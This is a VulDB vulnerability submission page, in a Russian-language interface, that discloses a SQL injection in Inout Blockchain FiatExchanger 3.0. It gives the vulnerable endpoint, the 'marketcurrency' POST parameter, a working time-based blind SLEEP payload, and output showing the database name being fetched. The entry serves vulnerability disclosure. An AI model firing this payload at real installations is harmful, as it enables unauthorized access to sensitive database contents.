Отправить #177560: Inout Blockchain FiatExchanger 3.0 - SQL InjectionИнформация

НазваниеInout Blockchain FiatExchanger 3.0 - SQL Injection
Описание# Exploit Title: Inout Blockchain FiatExchanger 3.0 - SQL Injection # Date: 04/07/2023 # Exploit Author: CraCkEr # Vendor: Inout Scripts # Vendor Homepage: https://www.inoutscripts.com/ # Software Link: https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/ # Version: 3.0 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /index.php/coins/update_marketboxslider ---------------------------------------------- POST /index.php/coins/update_marketboxslider HTTP/2 marketcurrency=[SQLI]&displaylimit=4 ---------------------------------------------- POST parameter 'marketcurrency' is vulnerable to SQL Injection --- Parameter: marketcurrency (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: marketcurrency=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&displaylimit=4 --- [+] Starting the Attack fetching current database current database: '*****_blockchain_fiatexchanger_**' [-] Done
Пользователь
 skalvin (UID 49463)
Представление04.07.2023 17:58 (3 лет назад)
Модерация11.07.2023 17:26 (7 days later)
Статуспринято
Запись VulDB233577 [Nesote Inout Blockchain FiatExchanger 3.0 POST Parameter update_marketboxslider marketcurrency SQL-инъекция]
Баллы17

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!